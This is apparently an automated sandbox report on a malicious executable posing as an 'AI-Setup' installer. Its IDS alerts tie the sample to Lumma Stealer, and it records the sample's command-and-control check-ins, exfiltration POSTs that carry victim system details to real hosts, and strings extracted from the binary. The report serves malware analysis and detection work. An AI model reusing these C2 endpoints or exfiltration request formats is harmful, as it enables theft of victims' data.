Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdbSHA256B source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net7.0-windows\Microsoft.Win32.Registry.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdbSHA256A) source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Console.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdbSHA256 ] source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net7.0-windows\System.Net.Http.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586133206.0000000009EE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2585894979.0000000009D40000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49924 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49924 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49956 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49962 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49930 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49930 -> 172.67.178.191:443
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 8397
Source: unknown Network traffic detected: HTTP traffic on port 8397 -> 49805
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49733 -> 194.15.46.236:8397
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /8.46.123.75/json HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /software/AI-Setup HTTP/1.1Host: 194.15.46.236:8397
Source: global traffic HTTP traffic detected: POST /notify-launch HTTP/1.1Host: 194.15.46.236:8397Content-Type: application/json; charset=utf-8Content-Length: 268Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 22 75 73 65 72 4e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 73 79 73 74 65 6d 22 3a 22 57 69 6e 33 32 4e 54 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 2e 31 39 30 34 35 2e 30 22 2c 22 6c 61 75 6e 63 68 43 6f 64 65 22 3a 22 41 49 2d 53 65 74 75 70 22 2c 22 73 6f 66 74 77 61 72 65 53 74 61 74 75 73 22 3a 22 54 72 75 65 22 2c 22 70 72 6f 63 65 73 73 6f 72 22 3a 22 49 6e 74 65 6c 36 34 20 46 61 6d 69 6c 79 20 36 20 4d 6f 64 65 6c 20 31 34 33 20 53 74 65 70 70 69 6e 67 20 38 2c 20 47 65 6e 75 69 6e 65 49 6e 74 65 6c 22 2c 22 67 70 75 22 3a 22 53 41 4b 32 50 58 22 2c 22 61 6e 74 69 76 69 72 75 73 22 3a 22 55 6e 6b 6e 6f 77 6e 20 41 6e 74 69 76 69 72 75 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 7d Data Ascii: {"ip":"8.46.123.75","userName":"user","system":"Win32NT Microsoft Windows NT 10.0.19045.0","launchCode":"AI-Setup","softwareStatus":"True","processor":"Intel64 Family 6 Model 143 Stepping 8, GenuineIntel","gpu":"SAK2PX","antivirus":"Unknown Antivirus","country":"US"}
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: ipinfo.io
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 194.15.46.236:8397
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49924 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49930 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49937 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49943 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49972 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 172.67.178.191:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 172.67.74.152:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 34.117.59.81:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49799 -> 172.67.74.152:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N9VBPBASCUN4LT6T4PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D66BD5XYE6FE15S1U9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O3FE5JO3EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20378Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZJLGCJ447ZQYPXPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: seat-tabooz.cyou
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ROW280E3GQ9EGOVW1HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584767Host: seat-tabooz.cyou
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: unknown TCP traffic detected without corresponding DNS query: 194.15.46.236
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /8.46.123.75/json HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic HTTP traffic detected: GET /software/AI-Setup HTTP/1.1Host: 194.15.46.236:8397
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: seat-tabooz.cyou
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seat-tabooz.cyou
Source: mDHwap5GlV.exe String found in binary or memory: http://.css
Source: mDHwap5GlV.exe String found in binary or memory: http://.jpg
Source: mDHwap5GlV.exe String found in binary or memory: http://194.15.46.236:8397
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052FE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://194.15.46.236:8397/
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052FE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://194.15.46.236:8397/notify-launchH
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://194.15.46.236:8397/software/AI-Setup
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000051BD000.00000004.00001000.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052EE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org:443/
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: decrypted_app_1.exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: mDHwap5GlV.exe String found in binary or memory: http://html4/loose.dtd
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.00000000052CA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io:443/
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000004.00000002.1921706741.0000000004984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/FSCTutorial.htm
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/FSCTutorial.htmU
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr String found in binary or memory: http://www.faststone.org/U
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: pipanel.exe, 00000008.00000003.3199592072.0000000005366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: pipanel.exe, 00000008.00000003.3149914594.000000000536F000.00000004.00000800.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3150677116.0000000005358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/binaryformatter
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: mDHwap5GlV.exe, 00000000.00000002.2577048094.00000000088EA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000009371000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/download
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/downloadInstall
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/info
Source: mDHwap5GlV.exe String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundFailed
